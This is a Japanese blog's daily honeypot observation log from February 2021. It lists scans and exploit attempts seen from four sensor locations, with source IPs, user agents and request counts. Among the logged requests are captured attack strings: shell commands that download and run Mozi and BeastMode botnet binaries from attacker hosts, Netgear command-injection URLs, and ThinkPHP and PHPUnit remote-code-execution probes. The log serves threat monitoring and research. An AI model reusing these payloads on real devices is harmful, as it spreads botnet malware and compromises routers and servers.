コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/02/18 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/02/18分です。

特徴
共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//88[.]212[.]29[.]212:40049/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

DrayTek製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
XTCによるスキャン行為
ZmEuによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 192.210.239.115/beastmode/b3astmode.arm7;
chmod 777 /tmp/b3astmode.arm7;
sh /tmp/b3astmode.arm7 BeastMode.Rep.Jaws
cd /tmp;
rm -rf *;
wget http[:]//111[.]172[.]38[.]82:53977/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget http[:]//178[.]175[.]125[.]171:50853/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//118[.]32[.]210[.]177:52611/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget http[:]//178[.]175[.]59[.]139:35555/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:66 (前日比:-10)
US:総アクセス数:135 (前日比:-12)
UK:総アクセス数:152 (前日比:+78)
SG:総アクセス数:63 (前日比:-284)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
1 8.210.159.44 Singapore
1 37.49.225.127 Belize
1 37.49.229.191 Belize
1 45.58.43.103 United States
2 45.141.86.100 Russia
22 45.155.205.108 Russia
2 51.124.24.40 United Kingdom
1 52.15.67.59 United States
1 52.188.127.216 United States
1 78.128.112.18 Bulgaria
10 121.201.91.135 China
2 142.93.251.80 United States
2 157.230.58.89 United States
4 165.22.6.220 United States
1 172.81.237.198 China
1 172.105.89.161 United States
1 174.138.4.57 United States
4 185.142.236.43 Seychelles
2 185.239.242.171 Netherlands
3 209.141.60.60 United States
2 222.186.136.150 China

UserAgent一覧

件数 UserAgent
19 -
3 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.205.0 Safari/532.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
3 \x03
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /ab2g HTTP/1.1
2 GET /ab2h HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /login HTTP/1.0
2 GET /maintenances HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/html/ HTTP/1.0
1 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`cd /tmp;
1 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.202.112.47 China
4 13.78.59.99 United States
4 13.90.140.186 United States
1 36.32.3.132 China
1 37.49.229.191 Belize
1 40.113.57.150 United States
22 45.155.205.108 Russia
1 46.101.1.142 United States
1 49.118.201.237 China
3 49.234.3.179 China
4 54.39.182.250 Canada
1 59.96.36.60 India
2 68.183.127.36 United States
1 78.128.112.18 Bulgaria
1 88.212.29.212 Slovakia
1 91.241.19.60 Russia
1 110.83.32.83 China
1 112.80.136.206 China
1 112.94.98.142 China
1 113.58.243.140 China
1 113.128.105.178 China
1 113.206.130.112 China
1 150.255.3.172 China
2 157.230.49.245 United States
1 171.34.176.93 China
1 172.104.242.173 United States
1 172.105.89.161 United States
1 175.152.111.90 China
1 178.175.52.233 Albania
2 185.232.69.2 Austria
67 203.34.153.71 China
1 209.141.60.60 United States
2 222.186.136.150 China

UserAgent一覧

件数 UserAgent
14 -
3 Go-http-client/1.1
2 Hello, World
1 Hello, world
67 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
1 Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数 Method Request Protocol
2 \x03
1 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
5 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /11.txt HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Application/Basic/Static/css/customerselect.css HTTP/1.1
1 GET /EIMSII/assets/bundle/commons.js HTTP/1.1
1 GET /Loan/SubmitLogin HTTP/1.1
1 GET /Pay/index.php HTTP/1.1
1 GET /Public/Home/statics/web/js/style.js HTTP/1.1
1 GET /Public/Manage/js/cvphp.js HTTP/1.1
1 GET /Public/Wchat/js/cvphp.js HTTP/1.1
1 GET /Public/app/js/cvphp.js HTTP/1.1
1 GET /Public/home/appjs/Index.js HTTP/1.1
1 GET /Public/js/chatmsg.js HTTP/1.1
1 GET /Public/mobile/js/config.js HTTP/1.1
1 GET /Resource/webResource/js/newcheck.js HTTP/1.1
1 GET /Six/Js/class_12.js HTTP/1.1
1 GET /Template/Home/Run/record.html HTTP/1.1
1 GET /User/Reg/ HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /ab2g HTTP/1.1
2 GET /ab2h HTTP/1.1
1 GET /admin/css/style.css HTTP/1.1
1 GET /api/v1/member/home HTTP/1.1
1 GET /app/common.js?version=2.4.43&build=1563436823 HTTP/1.1
1 GET /app/lan/BeforeLoginCn.js HTTP/1.1
1 GET /case/ HTTP/1.1
1 GET /chs/js/lang_zh_tw.js HTTP/1.1
1 GET /cloud-app/include/css/uncall.css HTTP/1.1
1 GET /cn.gzjs HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /css/view/main/gift.css HTTP/1.1
1 GET /eims3/assets/bundle/commons.js HTTP/1.1
1 GET /erm/help/how_to_getstarted.html HTTP/1.1
1 GET /etms/assets/bundle/commons.js HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /gai/ucms/login.php HTTP/1.1
1 GET /goip/cron.htm HTTP/1.1
1 GET /images2/bankCheck.js HTTP/1.1
1 GET /index.html?findcli=-1 HTTP/1.1
1 GET /index.php?g=Pay&m=Res&a=ispay HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index/index/ajaxreg.shtml HTTP/1.1
1 GET /index/index/register1/type/1.html HTTP/1.1
1 GET /index2.php HTTP/1.1
1 GET /index3.php?m=Order&a=hetong&id=999999 HTTP/1.1
2 GET /jenkins/login HTTP/1.0
1 GET /js/guest.js HTTP/1.1
1 GET /js/room.js HTTP/1.1
1 GET /js/sms.js HTTP/1.1
1 GET /jsonpublic/selectAddtion.asp HTTP/1.1
1 GET /lateron.asp HTTP/1.1
2 GET /login HTTP/1.0
2 GET /manager/html HTTP/1.1
1 GET /mindex/statics/js/qiandao.js HTTP/1.1
1 GET /mmbh/login.php HTTP/1.1
1 GET /pczs/js/trendChart.js HTTP/1.1
1 GET /phpcms/modules/member/touzi.php HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
2 GET /pmd/index.php HTTP/1.1
1 GET /public/static/js/main.js HTTP/1.1
1 GET /resources/main/common.js HTTP/1.1
1 GET /scripts/LoadAjaxIco.js HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//88[.]212[.]29[.]212:40049/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /smb_scheduler/cdr.htm HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /source/pack/upload/install/ios.php HTTP/1.1
1 GET /static/admin/js/cvphp.js HTTP/1.1
1 GET /static/css/system/login.css?v=SimCloud%20V1.1.0_2018112816 HTTP/1.1
1 GET /static/home/static/js/iindex.js HTTP/1.1
1 GET /static/index.css HTTP/1.1
1 GET /static/index/js/lk/order.js HTTP/1.1
1 GET /static/js/base.js HTTP/1.1
1 GET /static/js/lang_json_cn.js HTTP/1.1
1 GET /static/js/winScale.js HTTP/1.1
1 GET /static/new/js/shangchuan.js HTTP/1.1
1 GET /static/pcweb/js/newcheck.js HTTP/1.1
1 GET /statics/js/hui.js HTTP/1.1
1 GET /trade/quote/list HTTP/1.1
2 GET /tree? HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /views/bank/bank.html HTTP/1.1
1 GET /views/ucenter/ucenter.js HTTP/1.1
1 GET /web/api/getConfig?type=several&keys=www_app_base:downloadUrl1,www_app_base:downloadUrl4&accessToken=undefined HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-login.php HTTP/1.1
1 GET /wx/ZFpass.asp HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 14.29.254.1 China
22 45.155.205.108 Russia
1 68.132.136.198 United States
2 68.183.114.19 United States
1 78.128.112.18 Bulgaria
1 95.32.79.98 Russia
1 103.254.154.72 Singapore
1 111.172.38.82 China
1 117.242.210.117 India
2 157.230.61.35 United States
1 172.104.242.173 United States
1 178.175.125.171 Albania
1 185.174.195.143 Russia
1 192.241.137.185 United States
62 193.254.245.90 Serbia
48 202.29.211.11 Thailand
2 209.141.60.60 United States
3 222.186.136.150 China

UserAgent一覧

件数 UserAgent
10 -
1 Go-http-client/1.1
3 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
62 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 XTC
48 ZmEu

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Line/ HTTP/1.1
1 GET /SPA112/ HTTP/1.1
1 GET /Telephone/ HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /aastra/ HTTP/1.1
2 GET /ab2g HTTP/1.1
2 GET /ab2h HTTP/1.1
1 GET /acehorseracingbets-lays/db/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /adm/scripts/setup.php HTTP/1.1
1 GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /admincooptel/phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /algo/ HTTP/1.1
1 GET /alt/sqladmin/scripts/setup.php HTTP/1.1
1 GET /asterisk.cfg/ HTTP/1.1
1 GET /asterisk.conf/ HTTP/1.1
1 GET /asterisk/ HTTP/1.1
1 GET /ata/ HTTP/1.1
1 GET /atacom/ HTTP/1.1
1 GET /autoprovision/ HTTP/1.1
1 GET /backups/ HTTP/1.1
1 GET /bkp/ HTTP/1.1
1 GET /cfg/ HTTP/1.1
1 GET /cisco/ HTTP/1.1
1 GET /conf.cfg/ HTTP/1.1
1 GET /conf/ HTTP/1.1
1 GET /config.txt/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /configuracion/phpmyadmin/scripts/setup.php HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /db/scripts/setup.php HTTP/1.1
1 GET /dbadmin/scripts/setup.php HTTP/1.1
1 GET /digium/ HTTP/1.1
1 GET /downloads/SemanaAcademica2007/MC07_Ajax/server/www/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /etc/asterisk/ HTTP/1.1
1 GET /etc/asterisk/sip.conf/ HTTP/1.1
1 GET /ext/ma/scripts/setup.php HTTP/1.1
1 GET /extensions.conf/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /firmware/ HTTP/1.1
1 GET /gateway/ HTTP/1.1
1 GET /goautodial/ HTTP/1.1
1 GET /grandstream/ HTTP/1.1
1 GET /gs/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /linksys/ HTTP/1.1
1 GET /mitel/ HTTP/1.1
1 GET /mmss/phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /mysql/scripts/setup.php HTTP/1.1
1 GET /mysql4/scripts/setup.php HTTP/1.1
1 GET /mysqladmin/scripts/setup.php HTTP/1.1
1 GET /mysqladminhksin/scripts/setup.php HTTP/1.1
1 GET /panasonic/ HTTP/1.1
1 GET /phone.cfg/ HTTP/1.1
1 GET /phone/ HTTP/1.1
1 GET /phone1.cfg/ HTTP/1.1
1 GET /php/phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /php/phpmyadmin2102/scripts/setup.php HTTP/1.1
1 GET /php/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-www072510/scripts/setup.php HTTP/1.1
2 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin2/scripts/setup.php HTTP/1.1
1 GET /phpMyAdminold/scripts/setup.php HTTP/1.1
1 GET /phpadmin/scripts/setup.php HTTP/1.1
1 GET /phpdbku/scripts/setup.php HTTP/1.1
1 GET /phpmy/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin.box25/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.ph HTTP/1.1
2 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php/index.php HTTP/1.1
1 GET /phpmyadmin3/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin_/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /polycom/ HTTP/1.1
1 GET /prov/ HTTP/1.1
1 GET /provision/ HTTP/1.1
1 GET /provisioning/ HTTP/1.1
1 GET /pyaniste/mysqladmin/scripts/setup.php HTTP/1.1
1 GET /sangoma/ HTTP/1.1
1 GET /scripts/setup.php HTTP/1.1
1 GET /secret123/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//95[.]32[.]79[.]98:49933/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+192.210.239.115/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//111[.]172[.]38[.]82:53977/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]175[.]125[.]171:50853/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sip.cfg/ HTTP/1.1
1 GET /sip.conf/ HTTP/1.1
1 GET /sip.txt/ HTTP/1.1
1 GET /sip/ HTTP/1.1
1 GET /sip/sitemap/ HTTP/1.1
1 GET /sipconf/ HTTP/1.1
1 GET /sipura/ HTTP/1.1
1 GET /sitemap.sip/ HTTP/1.1
1 GET /sitemap/asterisk/ HTTP/1.1
1 GET /snom/ HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /spa/ HTTP/1.1
1 GET /spectralink/ HTTP/1.1
1 GET /sqladmin/scripts/setup.php HTTP/1.1
1 GET /tftp/ HTTP/1.1
1 GET /tftpboot/ HTTP/1.1
1 GET /tftpphone/ HTTP/1.1
1 GET /tftproot/ HTTP/1.1
1 GET /tiger/ HTTP/1.1
1 GET /txt/ HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /voip/ HTTP/1.1
1 GET /voip/sip/ HTTP/1.1
1 GET /vtech/ HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /wkn/ HTTP/1.1
1 GET /wordpress/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /yealink/ HTTP/1.1
1 GET /yeastar/ HTTP/1.1
1 GET /~phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /~riba/pma/scripts/setup.php HTTP/1.1
1 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
4 13.232.114.118 United States
1 20.48.95.14 United States
1 23.98.183.87 United States
1 36.69.169.150 Indonesia
1 37.49.229.191 Belize
1 45.87.62.119 United States
1 45.141.86.100 Russia
22 45.155.205.108 Russia
1 46.101.17.209 United States
4 47.114.73.0 China
1 78.128.112.18 Bulgaria
1 110.177.181.177 China
1 113.58.240.76 China
1 118.32.210.177 South Korea
1 119.118.16.69 China
1 121.237.168.183 China
1 124.227.31.113 China
1 124.227.31.204 China
1 124.235.138.140 China
1 149.129.55.193 Singapore
2 157.230.61.106 United States
1 172.104.242.173 United States
1 172.105.77.209 United States
1 172.105.89.161 United States
1 178.175.59.139 Albania
1 185.141.61.61 Cyprus
1 185.232.22.146 Romania
1 185.232.69.2 Austria
1 209.141.60.60 United States
1 220.200.167.217 China
1 221.213.75.22 China
1 222.137.34.125 China
2 222.186.136.150 China
1 223.166.75.57 China

UserAgent一覧

件数 UserAgent
12 -
3 Go-http-client/1.1
1 Hello, World
2 Hello, world
1 Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0
5 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x03
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
6 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
2 GET /jenkins/login HTTP/1.0
2 GET /login HTTP/1.0
2 GET /manager/html HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//118[.]32[.]210[.]177:52611/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
